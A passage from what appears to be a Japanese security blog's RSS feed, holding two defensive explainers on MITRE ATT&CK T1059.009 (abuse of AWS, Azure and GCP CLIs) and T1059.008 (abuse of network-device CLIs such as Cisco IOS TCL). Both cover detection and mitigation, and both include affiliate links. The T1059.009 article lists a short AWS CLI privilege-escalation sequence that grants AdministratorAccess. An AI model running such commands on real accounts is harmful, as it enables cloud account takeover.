<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Executionとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1204-user-execution/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:07:56 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[Cloud Administration]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[T1059.009]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 AWS CLI、Azure CLI、GCloud CLIなどのクラウド管理コマンドは、クラウドインフラを効率的 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/">T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>AWS CLI、Azure CLI、GCloud CLIなどのクラウド管理コマンドは、クラウドインフラを効率的に運用するために欠かせないツールです。しかし、これらの正規ツールが攻撃者に悪用されると、IAMロールの権限で任意のクラウドリソースを操作され、データ漏洩やインフラ破壊に直結します。本記事ではMITRE ATT&amp;CK T1059.009「Cloud Administration Command」の定義、具体的な攻撃シナリオ、検知方法、そして実践的な防御策を、セキュリティ担当者・クラウドエンジニア向けに詳しく解説します。</p>



<h2 class="wp-block-heading">T1059.009 Cloud Administration Commandとは</h2>



<p>MITRE ATT&amp;CK T1059.009は、攻撃者がクラウドプロバイダ提供の管理コマンドやCLIツールを利用して悪意ある操作を行う手法です。<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/009/" target="_blank">MITRE ATT&amp;CK公式のT1059.009ページ</a>では、親テクニック<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a>のサブテクニックとして分類されています。</p>



<p>従来の<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">T1059.001 PowerShell</a>やBashなどはOS上のコマンドインタプリタが対象でしたが、T1059.009はクラウドネイティブな管理インターフェースに焦点を当てています。対象となるのはAWS CLI、Azure CLI、Azure PowerShell、Google Cloud SDK（gcloud）、AWS CloudShellなどです。</p>



<h2 class="wp-block-heading">なぜ攻撃者はクラウド管理コマンドを悪用するのか</h2>



<p>クラウド管理コマンドが攻撃者にとって魅力的な理由は以下の3点です。</p>



<h3 class="wp-block-heading">正規ツールであるため検知が困難</h3>



<p>AWS CLIやAzure CLIは運用チームが日常的に使用するツールです。攻撃者がこれらを使うと、正規の運用操作と悪意ある操作の区別が非常に困難になります。これは「Living off the Land（環境寄生型攻撃）」のクラウド版と言えます。</p>



<h3 class="wp-block-heading">強力な権限へのアクセス</h3>



<p>クラウドCLIはIAMロールやサービスプリンシパルに紐づいた権限で動作します。過剰な権限が付与されたIAMロールが漏洩した場合、攻撃者はS3バケットの全データダウンロード、EC2インスタンスの起動・停止、IAMポリシーの変更など、広範な操作を実行できます。</p>



<h3 class="wp-block-heading">マルウェア不要で攻撃が完結</h3>



<p>クラウドCLIはAPIを直接呼び出すため、マルウェアのインストールが不要です。認証情報（アクセスキーやトークン）さえ入手すれば、攻撃者のローカル環境から直接クラウドリソースを操作できてしまいます。</p>





<h2 class="wp-block-heading">AWS CloudShellの悪用シナリオ</h2>



<p>AWS CloudShellはAWSマネジメントコンソールからブラウザ上で直接CLIを実行できるサービスです。攻撃者がAWSコンソールへのアクセス権を得た場合、以下のような悪用が可能になります。</p>



<h3 class="wp-block-heading">シナリオ1：コンソールセッションハイジャック</h3>



<p>フィッシングや認証情報の窃取によりAWSコンソールにログインした攻撃者は、CloudShellを起動して追加のツールインストールなしに即座にAWS CLIコマンドを実行できます。CloudShellはセッションユーザーのIAM権限を自動的に引き継ぐため、権限設定によっては甚大な被害を引き起こします。</p>



<h3 class="wp-block-heading">シナリオ2：永続化のためのバックドア作成</h3>



<p>CloudShellから<code>aws iam create-access-key</code>コマンドで新しいアクセスキーを生成し、外部に送信するケースがあります。また、<code>aws lambda create-function</code>でバックドア用のLambda関数をデプロイするなど、永続的なアクセス手段を確保する手法も報告されています。</p>



<h2 class="wp-block-heading">IAMロール悪用との組み合わせ</h2>



<p>T1059.009は単独で使用されることもありますが、IAMロールの悪用と組み合わさることで被害が拡大します。</p>



<h3 class="wp-block-heading">権限昇格チェーン</h3>



<p>攻撃者は初期アクセスで得た限定的な権限から、以下のようなステップで権限を昇格させます。</p>



<ol class="wp-block-list">
<li>漏洩したアクセスキーで<code>aws sts get-caller-identity</code>を実行し、現在の権限を確認</li>
<li><code>aws iam list-attached-user-policies</code>でポリシーを列挙</li>
<li><code>aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess</code>で管理者権限を付与</li>
<li>管理者権限で任意のリソースを操作</li>
</ol>



<h3 class="wp-block-heading">クロスアカウントロールの悪用</h3>



<p>Azure環境では<code>az account list</code>でアクセス可能なサブスクリプションを列挙し、<code>az role assignment create</code>で他のサブスクリプションへの権限を取得するケースがあります。GCP環境でも<code>gcloud projects list</code>と<code>gcloud projects add-iam-policy-binding</code>の組み合わせで同様の横展開が可能です。</p>



<h2 class="wp-block-heading">実際の攻撃事例</h2>



<p>クラウド管理コマンドを悪用する脅威アクターの活動が複数報告されています。</p>



<h3 class="wp-block-heading">TeamTNTによるクラウドリソースの不正利用</h3>



<p>TeamTNTはクラウド環境を標的としたクリプトマイニンググループです。AWSのメタデータサービス（169.254.169.254）から認証情報を窃取し、AWS CLIを使ってEC2インスタンスの大量起動やS3バケットへのアクセスを行います。</p>



<h3 class="wp-block-heading">ScarletEelによるAWS環境への侵入</h3>



<p>ScarletEelは、Kubernetes環境への初期侵入後にAWS CLIを使って認証情報を列挙し、クロスアカウントでのラテラルムーブメントを行ったことが報告されています。<code>aws sts assume-role</code>を使い、複数のAWSアカウントを横断して暗号資産マイニングインフラを構築しました。</p>



<h3 class="wp-block-heading">LUCR-3（Scattered Spider）によるSaaS・クラウド攻撃</h3>



<p>LUCR-3はソーシャルエンジニアリングでIDP（Identity Provider）への初期アクセスを取得し、Azure CLIやAWS CLIを使ってクラウドリソースを操作することで知られています。特にAzure ADの設定変更やAWSのOrganizations操作を通じた大規模な情報窃取が確認されています。</p>



<h2 class="wp-block-heading">検知方法</h2>



<p>クラウド管理コマンドの悪用を検知するには、各クラウドプロバイダの監査ログを活用します。</p>



<h3 class="wp-block-heading">AWS CloudTrailによる検知</h3>



<p><a rel="noopener" href="https://docs.aws.amazon.com/ja_jp/awscloudtrail/latest/userguide/cloudtrail-user-guide.html" target="_blank">AWS CloudTrail</a>はすべてのAPI呼び出しを記録します。以下のイベントを監視することで不審な操作を検知できます。</p>



<ul class="wp-block-list">
<li><strong>CreateAccessKey</strong>：新しいアクセスキーの生成（バックドア作成の兆候）</li>
<li><strong>AssumeRole</strong>：ロールの引き受け（権限昇格・ラテラルムーブメント）</li>
<li><strong>ConsoleLogin + CloudShell起動</strong>：通常と異なるIPアドレスからのログイン後のCloudShell使用</li>
<li><strong>PutBucketPolicy</strong>：S3バケットポリシーの変更（データ流出の準備）</li>
</ul>



<h3 class="wp-block-heading">Azure Monitorによる検知</h3>



<p>Azure Activity LogとMicrosoft Entra ID（旧Azure AD）のサインインログを組み合わせて監視します。<code>az role assignment create</code>の実行、通常と異なるIPアドレスからのAzure CLI認証、サービスプリンシパルの新規作成などが重要な検知ポイントです。</p>



<h3 class="wp-block-heading">GCP Audit Logsによる検知</h3>



<p>GCP Cloud Audit Logsでは、Admin Activity ログとData Access ログを有効にし、<code>SetIamPolicy</code>の呼び出し、新規サービスアカウントキーの作成、通常と異なるリージョンからのAPI呼び出しを監視します。</p>



<h3 class="wp-block-heading">共通の検知ルール</h3>



<p>どのクラウドプロバイダでも有効な検知アプローチとして、以下のルールを設定することを推奨します。</p>



<ul class="wp-block-list">
<li>通常の運用時間外（深夜・休日）のCLI操作のアラート</li>
<li>新しいIPアドレスやユーザーエージェントからのAPI呼び出し</li>
<li>短時間での大量API呼び出し（偵察活動の兆候）</li>
<li>IAM関連操作（権限変更・キー作成）の即時アラート</li>
</ul>



<h2 class="wp-block-heading">緩和策と防御のベストプラクティス</h2>



<h3 class="wp-block-heading">最小権限のIAMポリシー設計</h3>



<p>IAMポリシーは最小権限の原則（Principle of Least Privilege）に基づいて設計します。<code>*</code>ワイルドカードの使用を避け、必要なリソースとアクションのみを許可するポリシーを作成してください。AWSでは<a rel="noopener" href="https://docs.aws.amazon.com/ja_jp/IAM/latest/UserGuide/access_policies_generate-policy.html" target="_blank">IAM Access Analyzer</a>を使って実際のアクセスパターンからポリシーを生成できます。</p>



<h3 class="wp-block-heading">条件付きアクセスポリシーの適用</h3>



<p>Azure Conditional Access PolicyやAWS IAM Conditionを使い、信頼できるIPアドレス、デバイス、時間帯のみからCLI操作を許可します。特にMFA（多要素認証）の強制は基本中の基本です。</p>



<h3 class="wp-block-heading">CloudShellの利用制限</h3>



<p>AWS CloudShellは便利ですが、攻撃者にも同様に便利です。IAMポリシーで<code>cloudshell:*</code>の権限を制限するか、AWS Organizations SCP（Service Control Policy）でCloudShellの利用を特定のアカウントや役割に限定することを検討してください。</p>



<h3 class="wp-block-heading">認証情報の管理強化</h3>



<p>長期的なアクセスキーの使用を避け、一時的な認証情報（STS）を使用します。アクセスキーは定期的にローテーションし、不要なキーは即座に無効化してください。<a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a>も、クラウド認証情報の管理について継続的に注意喚起を行っています。</p>



<h2 class="wp-block-heading">おすすめセキュリティ対策ツール</h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
クラウド環境の保護と併せて、管理端末のエンドポイントセキュリティも重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading">まとめ：クラウド管理コマンドの悪用を防ぐために</h2>



<ul class="wp-block-list">
<li>T1059.009はAWS CLI・Azure CLI・GCloud CLIなど正規のクラウド管理ツールを悪用する攻撃手法であり、正規操作との区別が困難なため検知難易度が高い</li>
<li>CloudShellの悪用やIAMロールとの組み合わせにより、権限昇格・ラテラルムーブメント・データ窃取に発展する</li>
<li>CloudTrail・Azure Monitor・GCP Audit Logsでの監査ログ監視と、通常パターンからの逸脱検知が最も有効な対策</li>
<li>最小権限のIAMポリシー設計、条件付きアクセスポリシー、CloudShellの利用制限を組み合わせた多層防御が不可欠</li>
<li>認証情報（アクセスキー）の管理強化と定期ローテーションを徹底し、攻撃の起点となる認証情報漏洩リスクを低減する</li>
</ul>



<p>クラウド環境のセキュリティは、従来のオンプレミスとは異なるアプローチが必要です。正規ツールが攻撃に使われるからこそ、ログの監視と権限管理が最大の防御線となります。自社のクラウド環境のIAM設定を今すぐ見直してみてください。</p>



<p>本記事はMITRE ATT&amp;CK® v16に基づいています。© The MITRE Corporation. Licensed under Apache License 2.0.<br>※本サイトはMITRE非公式の解説サイトです</p>



<p><strong>参考資料</strong>：
<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/009/" target="_blank">MITRE ATT&amp;CK T1059.009 &#8211; Cloud Administration Command</a> /
<a rel="noopener" href="https://www.ipa.go.jp/security/10threats/10threats2026.html" target="_blank">情報セキュリティ10大脅威 2026（IPA）</a> /
<a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a> /
<a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">内閣サイバーセキュリティセンター（NISC）</a>
</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p style="color:#64748b;font-size:0.85rem">Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報は<a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE公式サイト</a>をご参照ください。</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/">T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:07:45 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[Network Device CLI]]></category>
		<category><![CDATA[T1059.008]]></category>
		<category><![CDATA[ルーター]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 ネットワーク機器のCLI（コマンドラインインターフェース）は、ルーターやスイッチの管理に欠かせない強力なツール [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/">T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>ネットワーク機器のCLI（コマンドラインインターフェース）は、ルーターやスイッチの管理に欠かせない強力なツールです。しかし近年、攻撃者がCisco IOS、JunOS、NX-OSなどのネットワーク機器CLIを悪用し、組織のネットワークインフラを侵害する事例が増加しています。MITRE ATT&#038;CKフレームワークではこの手法をT1059.008「Network Device CLI」として分類しています。本記事では、ネットワーク機器CLIを悪用した攻撃の仕組み、実際の攻撃グループによる事例、検知方法、そして効果的な防御策まで、セキュリティ担当者が知るべきポイントを網羅的に解説します。</p>



<h2 class="wp-block-heading">T1059.008 Network Device CLIとは</h2>



<p>MITRE ATT&#038;CKにおけるT1059.008は、攻撃者がネットワーク機器に備わるCLI（コマンドラインインターフェース）を悪用して不正な操作を行う攻撃手法です。T1059「<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">Command and Scripting Interpreter</a>」のサブテクニックとして位置づけられています。</p>



<p>ネットワーク機器には、ルーター、スイッチ、ファイアウォールなどが含まれ、それぞれ独自のCLI環境を持っています。代表的なものにCisco IOSのCLI、Juniper JunOS CLI、Arista EOS CLIなどがあります。攻撃者はこれらのCLIにアクセスすることで、ネットワーク設定の変更、トラフィックの傍受、バックドアの設置、さらにはファームウェアの改ざんまで行うことが可能です。</p>



<p>この攻撃手法が特に危険なのは、ネットワーク機器がセキュリティ監視の盲点になりやすい点にあります。多くの組織ではエンドポイントやサーバーの監視に注力する一方、ネットワーク機器のセキュリティ監視は手薄になりがちです。</p>



<h2 class="wp-block-heading">攻撃者がネットワーク機器CLIを狙う理由</h2>



<h3 class="wp-block-heading">ネットワークの中枢を掌握できる</h3>



<p>ルーターやスイッチはネットワークトラフィックの中継点です。これらの機器を制御することで、攻撃者は通過するすべてのトラフィックを傍受・改ざんする能力を得ます。ACL（アクセス制御リスト）の変更によるファイアウォールルールの無効化、ルーティングテーブルの書き換えによるトラフィックのリダイレクト、GREトンネルやVPN設定を利用したデータの外部送信など、ネットワークレベルでの攻撃が可能になります。</p>



<h3 class="wp-block-heading">セキュリティ製品の監視対象外</h3>



<p>EDR（Endpoint Detection and Response）やアンチウイルスソフトはネットワーク機器上では動作しません。従来のセキュリティ対策ではネットワーク機器内部の不正な操作を検知することが困難です。攻撃者はこの監視の隙間を利用して、長期間にわたる持続的なアクセスを維持します。</p>



<h3 class="wp-block-heading">認証情報の取得が容易</h3>



<p>多くの組織では、ネットワーク機器にデフォルトの認証情報や脆弱なパスワードが使用されています。また、SSH鍵の管理が不十分であったり、TACACS+やRADIUSなどの認証サーバーとの連携が適切に構成されていないケースも少なくありません。攻撃者は初期アクセスで取得した認証情報を流用して、ネットワーク機器へのアクセスを獲得します。</p>

<!-- /wp:post-content -->

<!-- wp:image -->
<figure class="wp-block-image"><img decoding="async" src="" alt="ネットワーク機器CLIを利用した攻撃の概要"/></figure>
<!-- /wp:image -->

<!-- wp:heading -->
<h2 class="wp-block-heading">ネットワーク機器CLI上でのTCLスクリプト悪用</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Cisco IOSには、TCL（Tool Command Language）スクリプトを実行する機能が搭載されています。攻撃者はこの機能を悪用して、ネットワーク機器上で自動化された不正操作を実行します。</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>具体的な悪用例として以下が挙げられます：</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><strong>設定情報の外部送信</strong>：TCLスクリプトでルーターの設定ファイル（running-config）を取得し、TFTPやHTTPで外部サーバーに送信</li>
<li><strong>バックドアアカウントの作成</strong>：管理者権限を持つ隠しアカウントをスクリプトで自動作成</li>
<li><strong>ネットワークスキャン</strong>：TCLのソケット機能を利用して、内部ネットワークのスキャンを実行</li>
<li><strong>Syslog操作</strong>：ログの改ざんや削除により、攻撃の痕跡を消去</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>TCLスクリプトの悪用は、「tclsh」コマンドでインタラクティブモードに入ることで実行されます。Cisco IOSのバージョンによっては、権限レベル15（特権EXECモード）でなくても一部のTCL機能にアクセスできる場合があるため、権限管理の徹底が重要です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">実際の攻撃グループによる事例</h2>
<!-- /wp:heading -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">SYNful Knock（2015年）</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>2015年にFireEye（現Mandiant）が発見した「SYNful Knock」は、Cisco IOSルーターのファームウェアを改ざんするインプラント攻撃です。攻撃者はルーターのCLIアクセスを得た後、正規のIOSイメージを改ざんされたものに置き換えました。この改ざんされたファームウェアは再起動後も残存し、攻撃者に持続的なバックドアアクセスを提供しました。最大14カ国で被害が確認され、ネットワーク機器を標的とした攻撃の深刻さを世界に示しました。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">APT33 / Elfin</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>イラン系の攻撃グループAPT33（別名Elfin）は、中東やエネルギー分野の組織を標的にした攻撃キャンペーンにおいて、ネットワーク機器の脆弱性を積極的に悪用することが知られています。標的組織のネットワーク機器にアクセスし、ネットワーク設定を変更することでデータ傍受や横展開を行います。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Turla</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ロシア系のAPTグループTurlaは、ネットワークインフラストラクチャを標的とした高度な攻撃で知られています。ネットワーク機器を踏み台として利用し、標的組織の内部ネットワークへの持続的なアクセスを維持する手法を用いています。特にISP（インターネットサービスプロバイダ）レベルのネットワーク機器を侵害することで、広範囲の通信傍受を可能にしていました。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">検知方法</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器CLIの不正使用を検知するためには、複数のアプローチを組み合わせることが重要です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Syslogによるログ監視</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器のSyslogを外部のSyslogサーバーに転送し、リアルタイムで監視します。特に注目すべきログイベントは以下の通りです：</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list">
<li>設定変更イベント（%SYS-5-CONFIG_I）</li>
<li>ログイン試行の失敗（%SEC_LOGIN-5-LOGIN_SUCCESS, %SEC_LOGIN-4-LOGIN_FAILED）</li>
<li>特権モードへの昇格（%SYS-5-PRIV_AUTH_PASS）</li>
<li>ファイル操作イベント（コピー、削除など）</li>
</ul>
<!-- /wp:list -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">TACACS+によるコマンドアカウンティング</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>TACACS+サーバーを導入し、コマンドアカウンティングを有効にすることで、ネットワーク機器上で実行されたすべてのコマンドを記録できます。「show running-config」「copy」「tclsh」など、機密性の高いコマンドの実行を監視し、不審なコマンド実行パターンを検知します。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">NetFlowによるトラフィック分析</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>NetFlowデータを分析することで、ネットワーク機器から外部への不審な通信を検知できます。特に、管理用ネットワーク以外からのSSH/Telnet接続や、機器から外部へのTFTP/HTTP通信は要注意です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">SNMPトラップとファームウェア整合性検証</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>SNMP（Simple Network Management Protocol）トラップを設定し、設定変更やインターフェース状態の変化をリアルタイムで通知します。また、定期的にファームウェアのハッシュ値を検証し、不正な改ざんがないか確認することも重要です。Ciscoの場合は「verify /md5」コマンドでIOSイメージの整合性を確認できます。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">緩和策・防御方法</h2>
<!-- /wp:heading -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">AAA（認証・認可・アカウンティング）の徹底</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器へのアクセスには、TACACS+またはRADIUSを用いた集中管理型の認証基盤を導入します。ローカルアカウントの使用を最小限にし、多要素認証（MFA）の導入も検討してください。ロールベースアクセス制御（RBAC）により、各管理者に必要最小限の権限のみを付与します。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">ファームウェア整合性の確保</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器のファームウェアは、メーカー公式サイトから取得したものを使用し、インストール前にハッシュ値を検証します。Cisco Secure Boot、Juniper Secure Bootなどのセキュアブート機能を有効にし、不正なファームウェアの読み込みを防止します。定期的なファームウェアアップデートにより既知の脆弱性を解消することも重要です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">ネットワークセグメンテーション</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>管理用ネットワーク（Out-of-Band Management）を分離し、ネットワーク機器への管理アクセスは専用の管理セグメントからのみ許可します。VTY回線にACLを適用し、許可されたIPアドレスからのみSSH接続を受け付けるようにします。Telnetの使用は完全に廃止し、SSHのみに統一してください。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">構成管理とバージョン管理</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>RANCID、Oxidized、Ansible Networkなどの構成管理ツールを導入し、ネットワーク機器の設定をバージョン管理します。定期的に設定のバックアップを取得し、承認されていない変更が行われた場合にアラートを発報する仕組みを構築しましょう。構成のドリフト（意図しない変更）を自動検出する体制が理想的です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">おすすめセキュリティ対策ツール</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
ネットワーク機器への攻撃と併せて、エンドポイントの防御も重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>
<!-- /wp:quote -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">まとめ</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>MITRE ATT&#038;CK T1059.008「Network Device CLI」は、ネットワーク機器のCLIを悪用した攻撃手法です。本記事のポイントを整理します。</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><strong>ネットワーク機器は監視の盲点になりやすい</strong>：EDRやアンチウイルスが動作しないため、攻撃者にとって魅力的な標的です</li>
<li><strong>TCLスクリプトなどの正規機能が悪用される</strong>：正規のCLI機能を利用するため、通常のマルウェア検知では発見できません</li>
<li><strong>APT33やTurlaなどの国家支援型グループが活用</strong>：高度な攻撃グループがネットワーク機器を標的としています</li>
<li><strong>検知にはSyslog・TACACS+・NetFlowの組み合わせが有効</strong>：単一の検知手段では不十分であり、多層的な監視が必要です</li>
<li><strong>AAA・ファームウェア整合性・セグメンテーションで防御</strong>：基本的なセキュリティ対策の徹底が最も効果的な防御策です</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>ネットワーク機器のセキュリティは、組織のネットワーク全体の安全性を左右します。本記事の内容を参考に、自組織のネットワーク機器のセキュリティ体制を見直してみてください。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">参考リンク</h2>
<!-- /wp:heading -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1059/008/" target="_blank">MITRE ATT&#038;CK T1059.008 &#8211; Network Device CLI</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA 独立行政法人 情報処理推進機構 セキュリティセンター</a></li>
<li><a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC（一般社団法人JPCERTコーディネーションセンター）</a></li>
<li><a rel="noopener" href="https://sec.cloudapps.cisco.com/security/center/resources/integrity_assurance.html" target="_blank">Cisco IOS Software Integrity Assurance</a></li>
<li><a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">内閣サイバーセキュリティセンター（NISC）</a></li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>※本サイトはMITRE非公式の解説サイトです</p>
<!-- /wp:paragraph -->
